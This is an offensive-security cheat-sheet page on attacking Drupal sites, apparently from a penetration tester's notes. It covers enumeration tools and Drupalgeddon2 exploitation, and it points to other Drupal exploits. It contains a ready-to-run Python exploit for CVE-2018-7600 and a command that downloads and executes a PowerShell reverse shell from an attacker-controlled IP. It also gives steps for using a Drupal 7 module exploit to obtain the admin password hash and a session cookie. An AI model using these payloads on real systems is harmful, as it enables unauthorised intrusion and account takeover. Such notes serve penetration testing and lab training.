Content Management Systems

Interesting Writeups

https://blog.ripstech.com

Drupal

Enumeration

#https://github.com/droope/droopescan
./droopescan scan drupal -u 10.10.10.13

#https://github.com/immunIT/drupwn
python3 drupwn <URL>

Drupalgeddon2 RCE [ Drupal < 7.58 | 8.x < 8.3.9 | 8.4.x < 8.4.6 | 8.5.x < 8.5.1]

Exploit 1

#Usage
python3 exploit.py http://10.10.10.9 -c whoami

#Reverse shell
python3 exploit.py http://10.10.10.9 -c "powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.16 -Port 9001"

Exploit 2

#!/usr/bin/ python3
import sys
import requests

#######################################################
# Simple Exploit for CVE 2018-7600 (Drupalgeddon 2)
# Usage: python3 drupalgeddon.py http://target-address
#######################################################

target = sys.argv[1]

command = '''powershell -c IEX (New-Object Net.WebClient).downloadstring('http://192.168.206.133:8000/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.206.133 -Port 8081'''

url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': command }

print("Sending Payload...")

r = requests.post(url, data=payload)

print("Payload Sent.")

Drupal 8.x [CVE-2019–6340]

Unauthenticated remote code execution flaw in Drupal 8’s REST API module, which affects websites with Drupal REST API option enabled.

Exploit guide : https://medium.com/@briskinfosec/drupal-core-remote-code-execution-vulnerability-cve-2019-6340-35dee6175afa

Exploit : https://www.exploit-db.com/exploits/46459

python3 Drupal.py <Target-URL> <OS-Command>

Drupal 7.x Module Services

Exploit provides hash of the admin user a valid session cookie.

  • searchsploit -x php/webapps/41564.php

  • Identify the rest_endpoint and rest_pathand modify in payload script.

    • Check <URL>/rest, <URL>/rest_endpoint

  • Execute : 

apt-get install php-curl
#Two comments that are not wrapped properly that you’ll need to fix.
php 41564.php

  • The following 2 files will be created in the current directory.

  • You can either use the session details with a cookie manager or attempt to crack the admin password hash.

PreviousSMBNextFTP

Last updated